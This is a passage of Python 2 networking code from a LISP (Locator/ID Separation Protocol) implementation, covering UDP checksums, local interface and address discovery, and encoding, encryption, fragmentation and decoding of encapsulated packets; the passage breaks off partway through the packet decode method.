s = lisp_address(LISP_AFI_IPV6, source, LISP_IPV6_HOST_MASK_LEN, 0)
d = lisp_address(LISP_AFI_IPV6, dest, LISP_IPV6_HOST_MASK_LEN, 0)
udplen = socket.htonl(len(data))
next_header = socket.htonl(LISP_UDP_PROTOCOL)
pheader = s.pack_address()
pheader += d.pack_address()
pheader += struct.pack("II", udplen, next_header)
#
# Append UDP packet to pseudo-header. Add zeros to make 4 byte aligned.
#
udp = binascii.hexlify(pheader + data)
add = len(udp) % 4
for i in range(0,add): udp += "0"
#
# Go 2-bytes at a time so we only have to fold carry-over once.
#
checksum = 0
for i in range(0, len(udp), 4):
checksum += int(udp[i:i+4], 16)
#endfor
#
# Add in carry and byte-swap.
#
checksum = (checksum >> 16) + (checksum & 0xffff)
checksum += checksum >> 16
checksum = socket.htons(~checksum & 0xffff)
#
# Pack in 2-byte buffer and insert at last 2 bytes of UDP header.
#
checksum = struct.pack("H", checksum)
udp = data[0:6] + checksum + data[8::]
return(udp)
#enddef
#
# lisp_get_interface_address
#
# Based on supplied interface device, return IPv4 local interface address.
#
def lisp_get_interface_address(device):
#
# Check for illegal device name.
#
if (device not in netifaces.interfaces()): return(None)
#
# Check if there are no IPv4 addresses assigned to interface.
#
addresses = netifaces.ifaddresses(device)
if (addresses.has_key(netifaces.AF_INET) == False): return(None)
#
# Find first private address.
#
return_address = lisp_address(LISP_AFI_IPV4, "", 32, 0)
for addr in addresses[netifaces.AF_INET]:
addr_str = addr["addr"]
return_address.store_address(addr_str)
return(return_address)
#endfor
return(None)
#enddef
#
# lisp_get_input_interface
#
# Based on destination-MAC address of incoming pcap'ed packet, index into
# lisp_mymacs{} to get a interface name string (device name) for all
# interfaces that have the MAC address assigned.
#
# If dest-MAC is not us, look at source MAC to see if we are in a loopback
# situation testing application and xTR in the same system.
#
def lisp_get_input_interface(packet):
macs = lisp_format_packet(packet[0:12]).replace(" ", "")
da = macs[0:12]
sa = macs[12::]
try: my_sa = lisp_mymacs.has_key(sa)
except: my_sa = False
if (lisp_mymacs.has_key(da)): return(lisp_mymacs[da], sa, da, my_sa)
if (my_sa): return(lisp_mymacs[sa], sa, da, my_sa)
return(["?"], sa, da, my_sa)
#enddef
#
# lisp_get_local_interfaces
#
# Go populate the lisp.myinterfaces{} dictionary array. Key is device ID
# returned by the netifaces API.
#
def lisp_get_local_interfaces():
for device in netifaces.interfaces():
interface = lisp_interface(device)
interface.add_interface()
#endfor
return
#enddef
#
# lisp_get_loopback_address
#
# Get first loopback address on device lo which is not 127.0.0.1.
#
def lisp_get_loopback_address():
for addr in netifaces.ifaddresses("lo")[netifaces.AF_INET]:
if (addr["peer"] == "127.0.0.1"): continue
return(addr["peer"])
#endif
return(None)
#enddef
#
# lisp_is_mac_string
#
# Return True if the supplied string parameter is in the form "xxxx-xxxx-xxxx".
# The input prefix could be "xxxx-xxxx-xxxx/48".
#
def lisp_is_mac_string(mac_str):
mac = mac_str.split("/")
if (len(mac) == 2): mac_str = mac[0]
return(len(mac_str) == 14 and mac_str.count("-") == 2)
#enddef
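#
# _lisp_is_mac_string_examples
#
# Usage sketch (not part of the original source) for lisp_is_mac_string().
#
def _lisp_is_mac_string_examples():
    assert lisp_is_mac_string("0050-56b0-30a5")
    assert lisp_is_mac_string("0050-56b0-30a5/48")
    #
    # Dotted IPv4 addresses do not have the xxxx-xxxx-xxxx shape.
    #
    assert lisp_is_mac_string("10.0.0.1") == False
#enddef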
#
# lisp_get_local_macs
#
# Walk all interfaces, and for each ethernet interface, put the MAC address
# as a key into lisp_mymacs with a value of array of interface names.
#
def lisp_get_local_macs():
for device in netifaces.interfaces():
#
# Ignore bogus interface names that containers may create. Allow only
# names made of colons, dashes, and alphanumeric characters.
#
d = device.replace(":", "")
d = d.replace("-", "")
if (d.isalnum() == False): continue
#
# Need this for EOS because a "pimreg" interface will crash the call
# to netifaces.ifaddresses("pimreg").
#
try:
parms = netifaces.ifaddresses(device)
except:
continue
#endtry
if (parms.has_key(netifaces.AF_LINK) == False): continue
mac = parms[netifaces.AF_LINK][0]["addr"]
mac = mac.replace(":", "")
#
# GRE tunnels have strange MAC addresses (less than 48-bits). Ignore
# them.
#
if (len(mac) < 12): continue
if (lisp_mymacs.has_key(mac) == False): lisp_mymacs[mac] = []
lisp_mymacs[mac].append(device)
#endfor
lprint("Local MACs are: {}".format(lisp_mymacs))
return
#enddef
#
# lisp_get_local_rloc
#
# Use "ip addr show" on Linux and "ifconfig" on MacOS to get a local IPv4
# address. Get interface name from "netstat -rn" to grep for.
#
def lisp_get_local_rloc():
out = commands.getoutput("netstat -rn | egrep 'default|0.0.0.0'")
if (out == ""): return(lisp_address(LISP_AFI_IPV4, "", 32, 0))
#
# Get last item on first line of output.
#
out = out.split("\n")[0]
device = out.split()[-1]
addr = ""
macos = lisp_is_macos()
if (macos):
out = commands.getoutput("ifconfig {} | egrep 'inet '".format(device))
if (out == ""): return(lisp_address(LISP_AFI_IPV4, "", 32, 0))
else:
cmd = 'ip addr show | egrep "inet " | egrep "{}"'.format(device)
out = commands.getoutput(cmd)
if (out == ""):
cmd = 'ip addr show | egrep "inet " | egrep "global lo"'
out = commands.getoutput(cmd)
#endif
if (out == ""): return(lisp_address(LISP_AFI_IPV4, "", 32, 0))
#endif
#
# Check for multi-line. And favor returning private address so NAT
# traversal is used in lig.
#
addr = ""
out = out.split("\n")
for line in out:
a = line.split()[1]
if (macos == False): a = a.split("/")[0]
address = lisp_address(LISP_AFI_IPV4, a, 32, 0)
if (address.is_private_address()): return(address)
addr = a
#endfor
return(lisp_address(LISP_AFI_IPV4, addr, 32, 0))
#enddef
#
# lisp_get_local_addresses
#
# Use netifaces module to get a IPv4 and IPv6 local RLOC of this system.
# Return an array of 2 elements where [0] is an IPv4 RLOC and [1] is an
# IPv6 RLOC.
#
# Stores data in lisp.lisp_myrlocs[].
#
def lisp_get_local_addresses():
global lisp_myrlocs
#
# Check to see if we should not get the first address. Use environment
# variable (1-based addressing) to determine which one to get. If the
# number of addresses are less than the index, use the last one.
#
# The format of the environment variable could be <number> or
# <device>:<number>. The format could also be "<device>:" but make sure
# the user typed in a ":".
#
device_select = None
index = 1
parm = os.getenv("LISP_ADDR_SELECT")
if (parm != None and parm != ""):
parm = parm.split(":")
if (len(parm) == 2):
device_select = parm[0]
index = parm[1]
else:
if (parm[0].isdigit()):
index = parm[0]
else:
device_select = parm[0]
#endif
#endif
index = 1 if (index == "") else int(index)
#endif
rlocs = [None, None, None]
rloc4 = lisp_address(LISP_AFI_IPV4, "", 32, 0)
rloc6 = lisp_address(LISP_AFI_IPV6, "", 128, 0)
device_iid = None
for device in netifaces.interfaces():
if (device_select != None and device_select != device): continue
addresses = netifaces.ifaddresses(device)
if (addresses == {}): continue
#
# Set instance-ID for interface.
#
device_iid = lisp_get_interface_instance_id(device, None)
#
# Look for a non-link-local and non-loopback address.
#
if (addresses.has_key(netifaces.AF_INET)):
ipv4 = addresses[netifaces.AF_INET]
count = 0
for addr in ipv4:
rloc4.store_address(addr["addr"])
if (rloc4.is_ipv4_loopback()): continue
if (rloc4.is_ipv4_link_local()): continue
if (rloc4.address == 0): continue
count += 1
rloc4.instance_id = device_iid
if (device_select == None and
lisp_db_for_lookups.lookup_cache(rloc4, False)): continue
rlocs[0] = rloc4
if (count == index): break
#endfor
#endif
if (addresses.has_key(netifaces.AF_INET6)):
ipv6 = addresses[netifaces.AF_INET6]
count = 0
for addr in ipv6:
addr_str = addr["addr"]
rloc6.store_address(addr_str)
if (rloc6.is_ipv6_string_link_local(addr_str)): continue
if (rloc6.is_ipv6_loopback()): continue
count += 1
rloc6.instance_id = device_iid
if (device_select == None and
lisp_db_for_lookups.lookup_cache(rloc6, False)): continue
rlocs[1] = rloc6
if (count == index): break
#endfor
#endif
#
# Did we find an address? If not, loop and get the next interface.
#
if (rlocs[0] == None): continue
rlocs[2] = device
break
#endfor
addr1 = rlocs[0].print_address_no_iid() if rlocs[0] else "none"
addr2 = rlocs[1].print_address_no_iid() if rlocs[1] else "none"
device = rlocs[2] if rlocs[2] else "none"
device_select = " (user selected)" if device_select != None else ""
addr1 = red(addr1, False)
addr2 = red(addr2, False)
device = bold(device, False)
lprint("Local addresses are IPv4: {}, IPv6: {} from device {}{}, iid {}". \
format(addr1, addr2, device, device_select, device_iid))
lisp_myrlocs = rlocs
return((rlocs[0] != None))
#enddef
#
# lisp_get_all_addresses
#
# Return a list of all local IPv4 and IPv6 addresses from kernel. This is
# going to be used for building pcap and iptables filters. So no loopback or
# link-local addresses are returned.
#
def lisp_get_all_addresses():
address_list = []
for interface in netifaces.interfaces():
try: entry = netifaces.ifaddresses(interface)
except: continue
if (entry.has_key(netifaces.AF_INET)):
for addr in entry[netifaces.AF_INET]:
a = addr["addr"]
if (a.find("127.0.0.1") != -1): continue
address_list.append(a)
#endfor
#endif
if (entry.has_key(netifaces.AF_INET6)):
for addr in entry[netifaces.AF_INET6]:
a = addr["addr"]
if (a == "::1"): continue
if (a[0:5] == "fe80:"): continue
address_list.append(a)
#endfor
#endif
#endfor
return(address_list)
#enddef
#
# lisp_get_all_multicast_rles
#
# Grep lisp.config and get all multicast RLEs that appear in the configuration.
# Returns either an empty array or filled with one or more multicast addresses.
#
def lisp_get_all_multicast_rles():
rles = []
out = commands.getoutput('egrep "rle-address =" ./lisp.config')
if (out == ""): return(rles)
lines = out.split("\n")
for line in lines:
if (line[0] == "#"): continue
rle = line.split("rle-address = ")[1]
rle_byte = int(rle.split(".")[0])
if (rle_byte >= 224 and rle_byte < 240): rles.append(rle)
#endfor
return(rles)
#enddef
#------------------------------------------------------------------------------
#
# LISP packet contents. This keeps state for a LISP encapsulated packet that
# is processed by an RTR and ETR.
#
class lisp_packet():
def __init__(self, packet):
self.outer_source = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.outer_dest = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.outer_tos = 0
self.outer_ttl = 0
self.udp_sport = 0
self.udp_dport = 0
self.udp_length = 0
self.udp_checksum = 0
self.inner_source = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.inner_dest = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.inner_tos = 0
self.inner_ttl = 0
self.inner_protocol = 0
self.inner_sport = 0
self.inner_dport = 0
self.lisp_header = lisp_data_header()
self.packet = packet
self.inner_version = 0
self.outer_version = 0
self.encap_port = LISP_DATA_PORT
self.inner_is_fragment = False
self.packet_error = ""
#enddef
def encode(self, nonce):
#
# We could be running with no RLOCs found. If lisp_myrlocs[] is None,
# then self.outer_source will be LISP_AFI_NONE.
#
if (self.outer_source.is_null()): return(None)
#
# We have to build the LISP header here because if we are doing
# lisp-crypto, the ICV covers the LISP header. The function
# lisp_packet.encrypt() will put in the key-id.
#
if (nonce == None):
self.lisp_header.nonce(lisp_get_data_nonce())
elif (self.lisp_header.is_request_nonce(nonce)):
self.lisp_header.request_nonce(nonce)
else:
self.lisp_header.nonce(nonce)
#endif
self.lisp_header.instance_id(self.inner_dest.instance_id)
#
# Encrypt the packet. If something went wrong, send unencrypted packet
# by telling RLOC with key-id 0. For now, just use key-id 1. We are
# supporting just a single key.
#
self.lisp_header.key_id(0)
control = (self.lisp_header.get_instance_id() == 0xffffff)
if (lisp_data_plane_security and control == False):
addr_str = self.outer_dest.print_address_no_iid() + ":" + \
str(self.encap_port)
if (lisp_crypto_keys_by_rloc_encap.has_key(addr_str)):
keys = lisp_crypto_keys_by_rloc_encap[addr_str]
if (keys[1]):
keys[1].use_count += 1
packet, encrypted = self.encrypt(keys[1], addr_str)
if (encrypted): self.packet = packet
#endif
#endif
#endif
#
# Start with UDP header. Call hash_packet() to set source-port value.
# Unless we are doing lisp-crypto and nat-traversal.
#
self.udp_checksum = 0
if (self.encap_port == LISP_DATA_PORT):
if (lisp_crypto_ephem_port == None):
self.hash_packet()
else:
self.udp_sport = lisp_crypto_ephem_port
#endif
else:
self.udp_sport = LISP_DATA_PORT
#endif
self.udp_dport = self.encap_port
self.udp_length = len(self.packet) + 16
#
# IPv6 raw sockets need to have the UDP ports not swapped.
#
if (self.outer_version == 4):
sport = socket.htons(self.udp_sport)
dport = socket.htons(self.udp_dport)
else:
sport = self.udp_sport
dport = self.udp_dport
#endif
udp = struct.pack("HHHH", sport, dport, socket.htons(self.udp_length),
self.udp_checksum)
#
# Encode the LISP header.
#
lisp = self.lisp_header.encode()
#
# Now prepend all 3 headers, LISP, UDP, outer header. See lisp_packet.
# fix_outer_header() for byte-swap details for the frag-offset field.
#
if (self.outer_version == 4):
tl = socket.htons(self.udp_length + 20)
frag = socket.htons(0x4000)
outer = struct.pack("BBHHHBBH", 0x45, self.outer_tos, tl, 0xdfdf,
frag, self.outer_ttl, 17, 0)
outer += self.outer_source.pack_address()
outer += self.outer_dest.pack_address()
outer = lisp_ip_checksum(outer)
elif (self.outer_version == 6):
outer = ""
# short = 6 << 12
# short |= self.outer_tos << 4
# short = socket.htons(short)
# tl = socket.htons(self.udp_length)
# outer = struct.pack("HHHBB", short, 0, tl, 17, self.outer_ttl)
# outer += self.outer_source.pack_address()
# outer += self.outer_dest.pack_address()
else:
return(None)
#endif
self.packet = outer + udp + lisp + self.packet
return(self)
#enddef
def cipher_pad(self, packet):
length = len(packet)
if ((length % 16) != 0):
pad = ((length/16) + 1) * 16
packet = packet.ljust(pad)
#endif
return(packet)
#enddef
def encrypt(self, key, addr_str):
if (key == None or key.shared_key == None):
return([self.packet, False])
#endif
#
# Pad packet to multiple of 16 bytes and call AES cipher.
#
packet = self.cipher_pad(self.packet)
iv = key.get_iv()
ts = lisp_get_timestamp()
aead = None
if (key.cipher_suite == LISP_CS_25519_CHACHA):
encrypt = chacha.ChaCha(key.encrypt_key, iv).encrypt
elif (key.cipher_suite == LISP_CS_25519_GCM):
k = binascii.unhexlify(key.encrypt_key)
try:
aesgcm = AES.new(k, AES.MODE_GCM, iv)
encrypt = aesgcm.encrypt
aead = aesgcm.digest
except:
lprint("You need AES-GCM, do a 'pip install pycryptodome'")
return([self.packet, False])
#endtry
else:
k = binascii.unhexlify(key.encrypt_key)
encrypt = AES.new(k, AES.MODE_CBC, iv).encrypt
#endif
ciphertext = encrypt(packet)
if (ciphertext == None): return([self.packet, False])
ts = int(str(time.time() - ts).split(".")[1][0:6])
#
# GCM requires 16 bytes of an AEAD MAC tag at the end of the
# ciphertext. Needed to interoperate with the Go implementation of
# AES-GCM. The MAC digest was computed above.
#
if (aead != None): ciphertext += aead()
#
# Compute ICV and append to packet. ICV covers the LISP header, the
# IV, and the ciphertext.
#
self.lisp_header.key_id(key.key_id)
lisp = self.lisp_header.encode()
icv = key.do_icv(lisp + iv + ciphertext, iv)
ps = 4 if (key.do_poly) else 8
string = bold("Encrypt", False)
cipher_str = bold(key.cipher_suite_string, False)
addr_str = "RLOC: " + red(addr_str, False)
auth = "poly" if key.do_poly else "sha256"
auth = bold(auth, False)
icv_str = "ICV({}): 0x{}...{}".format(auth, icv[0:ps], icv[-ps::])
dprint("{} for key-id: {}, {}, {}, {}-time: {} usec".format( \
string, key.key_id, addr_str, icv_str, cipher_str, ts))
icv = int(icv, 16)
if (key.do_poly):
icv1 = byte_swap_64((icv >> 64) & LISP_8_64_MASK)
icv2 = byte_swap_64(icv & LISP_8_64_MASK)
icv = struct.pack("QQ", icv1, icv2)
else:
icv1 = byte_swap_64((icv >> 96) & LISP_8_64_MASK)
icv2 = byte_swap_64((icv >> 32) & LISP_8_64_MASK)
icv3 = socket.htonl(icv & 0xffffffff)
icv = struct.pack("QQI", icv1, icv2, icv3)
#endif
return([iv + ciphertext + icv, True])
#enddef
def decrypt(self, packet, header_length, key, addr_str):
#
# Do ICV first. If it succeeds, then decrypt. Get ICV from packet and
# truncate packet to run hash over. Compare packet hash with computed
# hash.
#
if (key.do_poly):
icv1, icv2 = struct.unpack("QQ", packet[-16::])
packet_icv = byte_swap_64(icv1) << 64
packet_icv |= byte_swap_64(icv2)
packet_icv = lisp_hex_string(packet_icv).zfill(32)
packet = packet[0:-16]
ps = 4
hash_str = bold("poly", False)
else:
icv1, icv2, icv3 = struct.unpack("QQI", packet[-20::])
packet_icv = byte_swap_64(icv1) << 96
packet_icv |= byte_swap_64(icv2) << 32
packet_icv |= socket.htonl(icv3)
packet_icv = lisp_hex_string(packet_icv).zfill(40)
packet = packet[0:-20]
ps = 8
hash_str = bold("sha", False)
#endif
lisp = self.lisp_header.encode()
#
# Get the IV and use it to decrypt and authenticate.
#
if (key.cipher_suite == LISP_CS_25519_CHACHA):
iv_len = 8
cipher_str = bold("chacha", False)
elif (key.cipher_suite == LISP_CS_25519_GCM):
iv_len = 12
cipher_str = bold("aes-gcm", False)
else:
iv_len = 16
cipher_str = bold("aes-cbc", False)
#endif
iv = packet[0:iv_len]
#
# Compute ICV over LISP header and packet payload.
#
computed_icv = key.do_icv(lisp + packet, iv)
p_icv = "0x{}...{}".format(packet_icv[0:ps], packet_icv[-ps::])
c_icv = "0x{}...{}".format(computed_icv[0:ps], computed_icv[-ps::])
if (computed_icv != packet_icv):
self.packet_error = "ICV-error"
funcs = cipher_str + "/" + hash_str
fail = bold("ICV failed ({})".format(funcs), False)
icv_str = "packet-ICV {} != computed-ICV {}".format(p_icv, c_icv)
dprint(("{} from RLOC {}, receive-port: {}, key-id: {}, " + \
"packet dropped, {}").format(fail, red(addr_str, False),
self.udp_sport, key.key_id, icv_str))
dprint("{}".format(key.print_keys()))
#
# This is the 4-tuple NAT case. There is another addr:port that
# should have the crypto-key the encapsulator is using. This is
# typically done on the RTR.
#
lisp_retry_decap_keys(addr_str, lisp + packet, iv, packet_icv)
return([None, False])
#endif
#
# Advance over IV for decryption.
#
packet = packet[iv_len::]
#
# Call AES or chacha cipher. For AES-CBC, make sure the ciphertext
# length is a multiple of 16 bytes before handing it to the decrypter.
#
ts = lisp_get_timestamp()
if (key.cipher_suite == LISP_CS_25519_CHACHA):
decrypt = chacha.ChaCha(key.encrypt_key, iv).decrypt
elif (key.cipher_suite == LISP_CS_25519_GCM):
k = binascii.unhexlify(key.encrypt_key)
try:
decrypt = AES.new(k, AES.MODE_GCM, iv).decrypt
except:
self.packet_error = "no-decrypt-key"
lprint("You need AES-GCM, do a 'pip install pycryptodome'")
return([None, False])
#endtry
else:
if ((len(packet) % 16) != 0):
dprint("Ciphertext not multiple of 16 bytes, packet dropped")
return([None, False])
#endif
k = binascii.unhexlify(key.encrypt_key)
decrypt = AES.new(k, AES.MODE_CBC, iv).decrypt
#endif
plaintext = decrypt(packet)
ts = int(str(time.time() - ts).split(".")[1][0:6])
#
# Decryption is done. Log the result and return the plaintext payload.
#
string = bold("Decrypt", False)
addr_str = "RLOC: " + red(addr_str, False)
auth = "poly" if key.do_poly else "sha256"
auth = bold(auth, False)
icv_str = "ICV({}): {}".format(auth, p_icv)
dprint("{} for key-id: {}, {}, {} (good), {}-time: {} usec". \
format(string, key.key_id, addr_str, icv_str, cipher_str, ts))
#
# Keep self.packet the outer header, UDP header, and LISP header.
# We will append the plaintext in the caller once we parse the inner
# packet length so we can truncate any padding the encryptor put on.
#
self.packet = self.packet[0:header_length]
return([plaintext, True])
#enddef
def fragment_outer(self, outer_hdr, inner_packet):
frag_len = 1000
#
# Break up packet payload in fragments and put in array to have
# IP header added in next loop below.
#
frags = []
offset = 0
length = len(inner_packet)
while (offset < length):
frag = inner_packet[offset::]
if (len(frag) > frag_len): frag = frag[0:frag_len]
frags.append(frag)
offset += len(frag)
#endwhile
#
# Now fix outer IPv4 header with fragment-offset values and add the
# IPv4 value.
#
fragments = []
offset = 0
for frag in frags:
#
# Set frag-offset field in outer IPv4 header.
#
fo = offset if (frag == frags[-1]) else 0x2000 + offset
fo = socket.htons(fo)
outer_hdr = outer_hdr[0:6] + struct.pack("H", fo) + outer_hdr[8::]
#
# Set total-length field in outer IPv4 header and checksum.
#
l = socket.htons(len(frag) + 20)
outer_hdr = outer_hdr[0:2] + struct.pack("H", l) + outer_hdr[4::]
outer_hdr = lisp_ip_checksum(outer_hdr)
fragments.append(outer_hdr + frag)
offset += len(frag) / 8
#endfor
return(fragments)
#enddef
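#
# Worked example: a 2400-byte inner payload yields fragments of 1000,
# 1000, and 400 bytes. The frag-offset field counts 8-byte units, so
# the three outer headers carry 0x2000|0, 0x2000|125, and 250, with
# the more-fragments bit clear only on the last fragment.
#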
def fragment(self):
packet = self.fix_outer_header(self.packet)
#
# If inner header is IPv4, we will fragment the inner header and encap
# each fragment. If the inner header is IPv6, we will not add the
# Fragmentation Header into the inner IPv6 packet.
#
length = len(packet)
if (length <= 1500): return([packet], "Fragment-None")
packet = self.packet
#
# Fragment the outer IPv4 header if the inner packet is IPv6 (or a MAC
# frame). We cannot fragment an IPv6 packet since we are not the source.
#
if (self.inner_version != 4):
ident = random.randint(0, 0xffff)
outer_hdr = packet[0:4] + struct.pack("H", ident) + packet[6:20]
inner_packet = packet[20::]
fragments = self.fragment_outer(outer_hdr, inner_packet)
return(fragments, "Fragment-Outer")
#endif
#
# Fragment inner IPv4 packet.
#
outer_hdr_len = 56 if (self.outer_version == 6) else 36
outer_hdr = packet[0:outer_hdr_len]
inner_hdr = packet[outer_hdr_len: outer_hdr_len + 20]
inner_packet = packet[outer_hdr_len + 20::]
#
# If DF-bit is set, don't fragment packet.
#
frag_field = struct.unpack("H", inner_hdr[6:8])[0]
frag_field = socket.ntohs(frag_field)
if (frag_field & 0x4000):
df_bit = bold("DF-bit set", False)
dprint("{} in inner header, packet discarded".format(df_bit))
return([], "Fragment-None-DF-bit")
#endif
offset = 0
length = len(inner_packet)
fragments = []
while (offset < length):
fragments.append(inner_packet[offset:offset+1400])
offset += 1400
#endwhile
#
# Now put inner header and outer header on each fragment.
#
frags = fragments
fragments = []
mf = True if frag_field & 0x2000 else False
frag_field = (frag_field & 0x1fff) * 8
for frag in frags:
#
# Set fragment-offset and MF bit if not last fragment.
#
ff = frag_field / 8
if (mf):
ff |= 0x2000
elif (frag != frags[-1]):
ff |= 0x2000
#endif
ff = socket.htons(ff)
inner_hdr = inner_hdr[0:6] + struct.pack("H", ff) + inner_hdr[8::]
#
# Set length of fragment, set up offset for next fragment-offset,
# and header checksum fragment packet. Then prepend inner header
# to payload.
#
length = len(frag)
frag_field += length
l = socket.htons(length + 20)
inner_hdr = inner_hdr[0:2] + struct.pack("H", l) + \
inner_hdr[4:10] + struct.pack("H", 0) + inner_hdr[12::]
inner_hdr = lisp_ip_checksum(inner_hdr)
fragment = inner_hdr + frag
#
# Change outer header length and header checksum if IPv4 outer
# header. If IPv6 outer header, the raw socket prepends the header.
#
length = len(fragment)
if (self.outer_version == 4):
l = length + outer_hdr_len
length += 16
outer_hdr = outer_hdr[0:2] + struct.pack("H", l) + \
outer_hdr[4::]
outer_hdr = lisp_ip_checksum(outer_hdr)
fragment = outer_hdr + fragment
fragment = self.fix_outer_header(fragment)
#endif
#
# Finally fix outer UDP header length. Byte-swap it.
#
udp_len_index = outer_hdr_len - 12
l = socket.htons(length)
fragment = fragment[0:udp_len_index] + struct.pack("H", l) + \
fragment[udp_len_index+2::]
fragments.append(fragment)
#endfor
return(fragments, "Fragment-Inner")
#enddef
def fix_outer_header(self, packet):
#
# IP_HDRINCL requires the total-length and frag-offset fields to be
# in host byte order, so they have to be byte-swapped here. But when
# testing, we (UPC guys) discovered the frag field didn't need
# swapping. The conclusion is that byte-swapping the frag field is
# necessary for MacOS but not for Linux OSes.
#
if (self.outer_version == 4 or self.inner_version == 4):
if (lisp_is_macos()):
packet = packet[0:2] + packet[3] + packet[2] + packet[4:6] + \
packet[7] + packet[6] + packet[8::]
else:
packet = packet[0:2] + packet[3] + packet[2] + packet[4::]
#endif
#endif
return(packet)
#enddef
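#
# Illustration: the total-length field (bytes 2-3) is byte-swapped to
# host order on both OSes, so a wire value of 0x05dc (1500) is stored
# as 0xdc05 before the raw-socket send. Only MacOS also needs the
# frag-offset field (bytes 6-7) swapped.
#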
def send_packet(self, lisp_raw_socket, dest):
if (lisp_flow_logging and dest != self.inner_dest): self.log_flow(True)
dest = dest.print_address_no_iid()
fragments, in_or_out = self.fragment()
for fragment in fragments:
if (len(fragments) != 1):
self.packet = fragment
self.print_packet(in_or_out, True)
#endif
try: lisp_raw_socket.sendto(fragment, (dest, 0))
except socket.error, e:
lprint("socket.sendto() failed: {}".format(e))
#endtry
#endfor
#enddef
def send_l2_packet(self, l2_socket, mac_header):
if (l2_socket == None):
lprint("No layer-2 socket, drop IPv6 packet")
return
#endif
if (mac_header == None):
lprint("Could not build MAC header, drop IPv6 packet")
return
#endif
packet = mac_header + self.packet
# try: l2_socket.send(packet)
# except socket.error, e:
# lprint("send_l2_packet(): socket.send() failed: {}".format(e))
# #endtry
# return
#
# Use tuntap tunnel interface instead of raw sockets for IPv6
# decapsulated packets.
#
l2_socket.write(packet)
return
#enddef
def bridge_l2_packet(self, eid, db):
try: dyn_eid = db.dynamic_eids[eid.print_address_no_iid()]
except: return
try: interface = lisp_myinterfaces[dyn_eid.interface]
except: return
try:
socket = interface.get_bridge_socket()
if (socket == None): return
except: return
try: socket.send(self.packet)
except socket.error, e:
lprint("bridge_l2_packet(): socket.send() failed: {}".format(e))
#endtry
#enddef
def decode(self, is_lisp_packet, lisp_ipc_socket, stats):
self.packet_error = ""
packet = self.packet
orig_len = len(packet)
L3 = L2 = True
#
# Get version number of outer header so we can decode outer addresses.
#
header_len = 0
iid = self.lisp_header.get_instance_id()
if (is_lisp_packet):
version = struct.unpack("B", packet[0:1])[0]
self.outer_version = version >> 4
if (self.outer_version == 4):
#
# MacOS is zeroing the IP header checksum for a raw socket.
# If we receive this, bypass the checksum calculation.
#
orig_checksum = struct.unpack("H", packet[10:12])[0]
packet = lisp_ip_checksum(packet)
checksum = struct.unpack("H", packet[10:12])[0]
if (checksum != 0):
if (orig_checksum != 0 or lisp_is_macos() == False):
self.packet_error = "checksum-error"
if (stats):
stats[self.packet_error].increment(orig_len)
#endif
lprint("IPv4 header checksum failed for outer header")
if (lisp_flow_logging): self.log_flow(False)
return(None)
#endif
#endif
afi = LISP_AFI_IPV4
offset = 12
self.outer_tos = struct.unpack("B", packet[1:2])[0]
self.outer_ttl = struct.unpack("B", packet[8:9])[0]
header_len = 20
elif (self.outer_version == 6):
afi = LISP_AFI_IPV6
offset = 8
tos = struct.unpack("H", packet[0:2])[0]
self.outer_tos = (socket.ntohs(tos) >> 4) & 0xff
self.outer_ttl = struct.unpack("B", packet[7:8])[0]
header_len = 40
else:
self.packet_error = "outer-header-error"
if (stats): stats[self.packet_error].increment(orig_len)
lprint("Cannot decode outer header")
return(None)
#endif
self.outer_source.afi = afi
self.outer_dest.afi = afi
addr_length = self.outer_source.addr_length()
self.outer_source.unpack_address(packet[offset:offset+addr_length])
offset += addr_length
self.outer_dest.unpack_address(packet[offset:offset+addr_length])
packet = packet[header_len::]
self.outer_source.mask_len = self.outer_source.host_mask_len()
self.outer_dest.mask_len = self.outer_dest.host_mask_len()
#
# Get UDP fields
#
short = struct.unpack("H", packet[0:2])[0]
self.udp_sport = socket.ntohs(short)
short = struct.unpack("H", packet[2:4])[0]
self.udp_dport = socket.ntohs(short)
short = struct.unpack("H", packet[4:6])[0]
self.udp_length = socket.ntohs(short)
short = struct.unpack("H", packet[6:8])[0]
self.udp_checksum = socket.ntohs(short)
packet = packet[8::]
#
# Determine what is inside, a packet or a frame.
#
L3 = (self.udp_dport == LISP_DATA_PORT or
self.udp_sport == LISP_DATA_PORT)
L2 = (self.udp_dport in (LISP_L2_DATA_PORT, LISP_VXLAN_DATA_PORT))
#
# Get LISP header fields.
#
if (self.lisp_header.decode(packet) == False):
self.packet_error = "lisp-header-error"
if (stats): stats[self.packet_error].increment(orig_len)
if (lisp_flow_logging): self.log_flow(False)
lprint("Cannot decode LISP header")
return(None)
#endif
packet = packet[8::]
iid = self.lisp_header.get_instance_id()
header_len += 16
#endif
if (iid == 0xffffff): iid = 0
#
# Time to decrypt if K-bits set.
#
decrypted = False
key_id = self.lisp_header.k_bits
if (key_id):
addr_str = lisp_get_crypto_decap_lookup_key(self.outer_source,
self.udp_sport)
if (addr_str == None):
self.packet_error = "no-decrypt-key"
if (stats): stats[self.packet_error].increment(orig_len)
self.print_packet("Receive", is_lisp_packet)
ks = bold("No key available", False)
dprint("{} for key-id {} to decrypt packet".format(ks, key_id))
if (lisp_flow_logging): self.log_flow(False)
return(None)
#endif
key = lisp_crypto_keys_by_rloc_decap[addr_str][key_id]
if (key == None):
self.packet_error = "no-decrypt-key"
if (stats): stats[self.packet_error].increment(orig_len)
self.print_packet("Receive", is_lisp_packet)
ks = bold("No key available", False)
dprint("{} to decrypt packet from RLOC {}".format(ks,
red(addr_str, False)))
if (lisp_flow_logging): self.log_flow(False)
return(None)
#endif
#
# Decrypt and continue processing inner header.
#
key.use_count += 1
packet, decrypted = self.decrypt(packet, header_len, key,
addr_str)
if (decrypted == False):
if (stats): stats[self.packet_error].increment(orig_len)
if (lisp_flow_logging): self.log_flow(False)
return(None)
#endif
#endif
#
# Get inner header fields.
#
version = struct.unpack("B", packet[0:1])[0]
self.inner_version = version >> 4
if (L3 and self.inner_version == 4 and version >= 0x45):
packet_len = socket.ntohs(struct.unpack("H", packet[2:4])[0])
self.inner_tos = struct.unpack("B", packet[1:2])[0]
self.inner_ttl = struct.unpack("B", packet[8:9])[0]
self.inner_protocol = struct.unpack("B", packet[9:10])[0]
self.inner_source.afi = LISP_AFI_IPV4
self.inner_dest.afi = LISP_AFI_IPV4
self.inner_source.unpack_address(packet[12:16])
self.inner_dest.unpack_address(packet[16:20])
frag_field = socket.ntohs(struct.unpack("H", packet[6:8])[0])
self.inner_is_fragment = (frag_field & 0x2000 or frag_field != 0)
